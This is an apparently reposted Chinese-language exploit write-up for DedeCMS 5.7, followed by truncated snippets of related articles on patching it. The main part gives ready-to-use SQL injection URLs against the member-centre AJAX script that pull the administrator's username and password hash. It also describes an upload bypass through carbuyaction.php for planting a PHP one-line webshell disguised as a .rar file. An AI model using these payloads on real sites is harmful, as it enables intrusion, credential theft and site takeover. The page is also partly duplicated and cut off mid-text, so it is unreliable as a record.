織夢5 7注入加上傳漏洞

2021-07-10 15:30:00 字數 1283 閱讀 5951

織夢5.7注入加上傳漏洞

分類: 安全 | 2012-05-5 | 擼過12,571次

2人扯談

會員中心查詢會員資訊語句過濾不嚴,導致url可提交注入引數;

會員中心有上傳動作過濾不嚴,導致上傳漏洞

詳細說明:

①注入漏洞。

這站 首先訪問「/data/admin/ver.txt」頁面獲取系統最後公升級時間,

然後訪問

「/member/ajax_membergroup.php?action=post&membergroup=1」

頁面,如圖說明存在該漏洞。

然後寫上語句

檢視管理員帳號

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

admin www.2cto.com

檢視管理員密碼

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

檢視管理員密碼

得到的是19位的,去掉前三位和最後一位,得到管理員的16位md5

8d29b1ef9f8c5a5af42

9cmd5沒解出來 只好測試第二個方法

②上傳漏洞:

只要登陸會員中心,然後訪問頁面鏈結

「/plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=../dialog/select_soft_post」

如圖,說明通過「/plus/carbuyaction.php」已經成功呼叫了上傳頁面「/dialog/select_soft_post」

於是將php一句話木馬副檔名改為「rar」等,利用提交頁面upload1.htm

plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">

file:

newname:提交

織夢5.7注入加上傳漏洞:3520.html

織夢5 7注入加上傳漏洞

會員中心查詢會員資訊語句過濾不嚴,導致url可提交注入引數 會員中心有上傳動作過濾不嚴,導致上傳漏洞 詳細說明 注入漏洞。這站 首先訪問 data admin ver.txt 頁面獲取系統最後公升級時間,然後訪問 member ajax membergroup.php?action post mem...

織夢CMS上傳漏洞修復

近段時間老是發現 title被注入其他資訊,應該是被植入 還是什麼的,非常困鬧,在 找了一些織夢漏洞的修補方法。任意檔案上傳漏洞修復 一 include dialog select soft post.php檔案,搜尋 大概在72行的樣子 fullfilename cfg basedir.activ...

織夢漏洞修復含任意檔案上傳漏洞與注入漏洞

很多人說織夢dedecms不好,因為用的人多了,找漏洞的人也多了,那麼如果我們能修復的話,這些都不是問題,今天我就為大家講解一下如何修復任意檔案上傳漏洞與注入漏洞。任意檔案上傳漏洞修復包含乙個檔案 include dialog select soft post.php sql注入漏洞包含5個檔案 i...